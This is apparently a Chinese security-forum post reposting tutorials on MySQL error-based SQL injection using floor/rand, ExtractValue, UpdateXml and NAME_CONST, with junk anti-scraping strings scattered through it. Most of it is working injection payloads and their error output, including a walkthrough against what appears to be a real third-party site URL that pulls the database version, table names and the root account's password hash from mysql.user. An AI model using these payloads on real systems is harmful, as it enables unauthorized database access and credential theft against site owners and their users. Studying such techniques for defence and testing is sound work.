找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3158|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:6 }  t& ~" w( a( \5 [: {
首先进行正常查询:

mysql> select * from article where id = 1;
3 W$ _& u0 a. f8 `. s' k+—-+——-+———+7 w- U  g. ?0 o! m3 V; o
| id | title | content |- H6 u( d# \' V0 n
+—-+——-+———+
$ I' Y( K, i  ~, o5 m+ T8 P' w! b6 e|  1 | test  | do it   |
( F6 W; r6 a1 C; Q/ t( R0 G$ Z' z+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
; W# M$ r, V! o; ]9 `ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
1 l& u0 u$ P6 R' X4 B' [8 V例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
9 S. ]* u; V1 w1 i! k! B1 dERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));* K# {  r# }( x8 d; \
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
! X4 K: O, w& B0 v6 P  E测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–0 ?. v! c' s: B; z  U0 H5 Z
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’


! l1 r/ U) J0 i2 G8 _+ I7 Z2 \, [6 i& I5 M0 `0 ?0 `

再收集:


" A$ V/ N. J9 E' |% A. B+ Lhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) , s2 I; s8 D2 Y8 {
6 z- B; r- \7 m! o) g' E
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
8 o( Z1 a! U# G% p  l1 P
) C0 I4 g8 r! j3 |/ S; ?http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c), z8 \0 T+ c. `& g
0 ]0 w$ c0 m" {+ i- ^1 |2 Z( \0 i
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
8 F; \  x" ?0 k1 G/ w6 O, Z& _0 r, t! A
MYSQL高版本报错注入技巧-利用NAME_CONST注入* j" e5 ]  t6 j' B) H8 k
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
0 J# d1 I4 |# b6 s* x
8 K( E9 ]& b& F
" N- }& Y: z- g/ R$ e相关信息5 k1 w/ m& C% J  o1 n
" {0 Z/ i/ u- [
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.  c3 K7 j/ |+ c. M
3 i/ P* ~+ P  O) ^" ~
Code:: g* F+ m( }* d
NAME_CONST(DATA, VALUE)% b; x2 b7 r& J4 u
1 s, \4 L/ h: R& b# k) o/ v! ~
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.! l& e6 }, R5 K2 b" m
( v2 t/ P) w8 P8 @# J* \9 ^! l1 o& n
SELECT NAME_CONST('TEST', 1). P7 ^' \5 F1 g- {7 R9 W
. J0 e7 N( P1 C  f+ F

4 _! i; P, h- ?' m- r: x, |0 k
  P3 v1 _9 |. ?8 {4 ^, B|---------------|
3 k% U7 @2 H) B; L|     TEST      |9 t; U- ]! A3 W/ I
|               |" y1 s  a1 W0 M# J2 I+ I7 N' U
|---------------|
' U8 `. S# B# t) A  U1 U9 r5 K  v|       1       |% `# w) y: c4 S$ D) B) |
|               |# M  C; J  D7 K$ B3 B& @4 F
|---------------|! B5 g  b6 d/ d$ y3 A% Z4 T# u+ I
! T; X+ c0 @  F; a% i/ ^
5 k- P3 m2 A2 Z
, M1 F( K6 j* d# Q% o) j

" W8 Y' \1 a* D3 |4 \http://dev.mysql.com/doc/refman/5.0/en/m...name-const
: c( N7 F% z, s+ I4 E  GIntro to MySQL Variables" a; g" e0 U6 [$ r
# S% g" {2 q6 `0 v
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
  A8 t  z5 F: R
* R: K" U  k' n$ a( bCode:
% o* D, v+ u3 E, n" ghttp://www.baido.hk/qcwh/content ... ;sid=19&cid=2610 {* P  W8 c! o, n2 E- T: K& X

% Q/ Q, Z; ]: w* h7 |& s
3 h+ D# }; {% L: E# m- h/ i
" W. }/ A& g; f4 @' Y# p* r' r# a
9 Q9 E$ E( s3 t- h' @
  U9 L) k" a4 ~& q& Q
Code:
# l  R3 A$ G8 }- kand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
, A* z9 W6 `! n$ Z9 ^- q

5 M% q" E  c% Y' X
4 f  \, ?& k* BVAR = Your MySQL variable.5 ?% I# q7 N2 P1 E; q9 w

% y% R; O9 P$ sMySQL 5.1.3 Server System Variables1 i+ _" i: c8 j/ s

' o" v8 D, v; e& FLet's try it out on my site..
/ g# j5 f2 V9 g, Y0 H7 V% n" [0 Y9 y6 h" M  u# Y5 G) }
Code:4 n/ c9 r& v5 Y# o, r/ l  C$ U
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
% U$ Y" D& |" @- D5 @1 U; i0 I
8 a/ Q7 H! d! G8 UErroruplicate column name '5.0.27-community-nt'
- c9 L1 p! h" j  f& m

* M9 j. V4 t* S+ k: \
$ B1 {) Q' c) U
8 U" `; O1 b6 |. u4 ?( [5 @
% r2 f6 _( [7 z% }% ^! f; T
; p: k* e0 b/ K1 c8 X" _
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again.... L0 x. c- D% u

! }( I- f. R  Q  BData Extraction
% `# O. @' j  r( r; _8 P2 ], _- k) k" W+ d& D% {( n, S# a
Code:/ \  u: |' T3 i' g1 A4 O0 e
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
1 W3 E" m* |1 `' q* ~- y

  {/ ^: {5 C' R0 N( l) q4 g) \; O* T6 N# l7 Y% O
We should get a duplicate column 1 error...
) A) c1 V. j4 a8 V" P1 w2 F4 h
; w0 @- }1 a- x1 U/ kCode:7 m' J$ K1 o8 t& W
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
. A+ ?; \. H( f; c
) n- a1 l7 ]% ?5 J  i& EErroruplicate column name '1$ c1 W1 Y5 s$ {; v
. v  p7 ~; s* k: l- E6 Y0 Q, U
0 C4 x+ d; v5 a% V/ Y
2 p3 [7 e* w: Y- X: f, O1 f

+ C8 \, r! \( R  Y# D

" b1 L; b8 O2 @+ x7 Z" L- T7 I! D, m7 |7 f
Now let's get the tables out this bitch..  F0 ~. K; e+ k& Y
2 X. t9 e0 Y, ^) ]" I( n$ i6 ], d
Code:: [' G2 T) U0 O1 M6 n) `5 Z% r
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--7 B$ [/ v  D" t. V4 \0 H, ^' U9 d

6 {/ S1 t) \+ G. L$ Y! Q9 o, z' @. t# G5 ]% s
Let's see if it works here, if it does, we can go on and finish the job." X, r+ O' k5 w

) i0 r" i2 Q, n& v  e0 PCode:! N, C6 ^/ ^9 Y
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
! |! v- y- C6 v1 G
8 j' s. s: ^: v4 b8 ?; h( q8 e7 Y% @6 R1 S2 d& d
Erroruplicate column name 'com_admanage# L8 I+ D- k( \* b+ b/ m
! h% U9 _( w3 ~  B/ F2 m

( L  Y* d1 A; J
! Q% v5 f7 o! W- ^# i! \; m) n8 j; C) P4 c9 e, K
. j  G' q1 v- h- x: E: ]
( b: Y  u1 K4 [6 D! @) R" R
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.) f0 k% g6 G$ M. C- `/ ]# U

# I" y  w- I. |. bLet's get the columns out of the user table..7 n+ f) l9 n6 N- Y! \$ |  }
9 e( o4 s8 e) O1 `9 D8 N1 ]
Code:. Y5 ]# \: ~2 J. Q% a6 z
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--; y8 P; `1 r" L# r/ T; E

3 D3 X# t5 T, h5 z3 D
/ [  }2 f8 }6 a5 r! bSo mine looks like this, and I get the duplicate column name 'Host'." v# T4 ?- V  R" r# ]2 h7 E+ E2 C

0 }" m) R9 a# T& k$ X* |) ?' ]Code:
% j  l" v* g9 F: W5 P2 ?http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
' L" [1 L1 C$ d* V$ s
! i% Q6 }" f9 c, p0 W5 T, ^' Y1 XErroruplicate column name 'Host'( u% v/ }. B0 \( B: N
: `1 l* L1 H  Q( Z/ q
( K7 |: L1 m5 {# [
1 g! D& {4 r3 \9 Y+ V; D2 O! N) q
0 x! f5 d1 r/ N# _7 d1 k/ l# {

% K2 r; g# y1 L, ]/ P% y' Z' f
, G( e) w( h  e6 ]" eWoot, time to finish this bitch off.' D! O% _- q% J+ D7 k8 |
. J8 Y3 Z) M1 h* X
Code:
9 P2 K7 A6 k8 p/ N' @% O! d+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
' i5 @7 a) q: C) u* w- e
9 k# V/ k2 @% r5 u

2 @$ C4 ^! B  @8 u: Y" \So mine looks like this...
2 _! d+ c6 q' V# r) m
- u: i; Z8 h2 ?2 Q) t, `( ]  YCode:+ D9 y! w3 i$ R; ?" x
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--0 |* u* t4 H& s! `
' M$ T; z" c* Y5 I( p
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'+ K# n! m+ [" u' u
2 S4 a: r, U$ m  K/ p3 i3 t1 y  A
+ n( d4 e! d4 {1 Y, X3 o
) A0 X% `% U5 z9 c
: C& \! F* l- z5 O$ o7 A2 t

' k. ]! R! {9 l6 Q- [+ M# a! q, C( n) ]7 W# B4 H8 W1 m
And there we have it, thanks for reading.
1 S) S1 B9 [* i7 ~  R/ Y

. O4 l8 t( T' V& G  A. v0 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表